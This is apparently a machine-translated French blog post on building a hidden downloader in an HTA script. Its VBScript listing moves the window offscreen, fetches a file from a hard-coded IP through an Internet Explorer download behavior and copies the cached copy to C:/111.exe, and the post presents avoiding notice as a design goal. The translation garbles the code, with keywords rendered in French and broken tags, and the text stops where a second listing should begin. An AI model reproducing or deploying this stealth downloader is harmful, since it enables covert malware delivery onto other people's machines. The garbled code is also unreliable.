1. Parlons d'abord de deux téléchargeurs VBS relativement nouveaux sur ce blog. L'un est fabriqué à l'aide du composant CDO.Message et l'autre est fabriqué à l'aide de Microsoft.xmldom. Voir http://www.jb51.net/article/15506.htm. L'un de ces deux téléchargeurs est gênant à utiliser et doit convertir l'EXE à l'avance. Deuxièmement, CScript.exe accédera au réseau pendant l'utilisation, ce qui n'est pas trop caché. La seconde est que certaines machines n'ont pas ces deux composantes et utilisent Adodb.stream, il y a donc des inconvénients.
2. Parlons du téléchargeur de Lake2 http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx. Ce téléchargeur est assez bon, mais il y a des problèmes. La première est que si un autre navigateur tel que 360 est installé, une fenêtre IE sera ouverte et l'emplacement du cache IE dans le registre peut ne pas être exact.
3. Alors, comment pouvons-nous mettre à jour ces défauts? Il y a encore un moyen. Nous utilisons HTA pour écrire ceci, ce qui est relativement rare. HH.EXE sera généralement publié lors de l'accès au réseau. Combien de difficultés doivent être résolues en écrivant ce téléchargeur:
(1). Make hta invisible------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(2). Faire des paramètres de la ligne de commande HTA -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(3). N'appelez pas tous les composants mentionnés dans les premier et deuxième éléments ci-dessus ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(4) Emplacement temporaire du cache .ie ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(5) Nous n'appelons aucun composant ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------.
4. Code (écrivez directement les paramètres dans HTA)
Le code est le suivant:
<Script Language = VBS>
window.moveto 4000,4000
window.Resizeto 0,0 'rendre HTA invisible
set objshell = createObject ("wscript.shell") 'hta peut directement appeler wscript.shell, mais ne peut pas appeler wscript.createObject ("wscript.shell")
DownPath = Objshell.ExpandenvironmentsTrings ("% UserProfile%") & "/ Paramètres locaux" "Obtenez le chemin de téléchargement en fonction de la variable d'environnement
définir xml = document.createElement ("xml") 'Le comportement par défaut de la création de l'appel d'élément XML IE
xml.addbehavior ("# par défaut # téléchargement")
xml.async = 0
xml.load ("http://192.168.0.10/xx.htm") 'Veuillez modifier le nom de l'EXE en espace. Si vous le téléchargez avec le logiciel FTP, cela peut ne pas fonctionner. Il vaut mieux le mettre.
Showallfile (track)
Sub ShowAllfile (Path) 'Traveling and Searching, utilisez directement le code de Lake2
FindFileName = "xx [1] .htm" 'C'est aussi ce que vous devez changer. Si ce qui précède est xx.htm, voici xx [1] .htm
Set fso = createObject ("scripting.fileSystemObject")
Set f = fso.getfolder (chemin)
Définir FC = F.
Pour chaque F1 en FC
Si fso.fileexists (path & "/" & f1.name & "/" & findfilename) alors
FSO.COPYFILE PATH & "/" & f1.name & "/" & findFileName ", C: /111.exe" 'Enregistrer sur c: /111.exe, et peut être modifié selon les besoins
'document.write "[+] Télécharger le succès!"
Terminer si
Path ShowAllFile & "/" & f1.name
Suivant
Définir FSO = rien
Sub-Sub
fenêtre
</cript>
L'utilisation est: mettez Exe comme xx.exe sur l'espace, puis double-cliquez sur ce HTA.
5. Un autre code (passez les paramètres de ligne de commande)
Je pense personnellement que le code de la quatrième partie est meilleur, il suffit de le modifier et de l'utiliser. Si les paramètres de ligne de commande sont appelés, j'ai constaté que la fenêtre HTA apparaîtra toujours et qu'elle ne fera qu'après le téléchargement, donc ce n'est pas très bon. Code: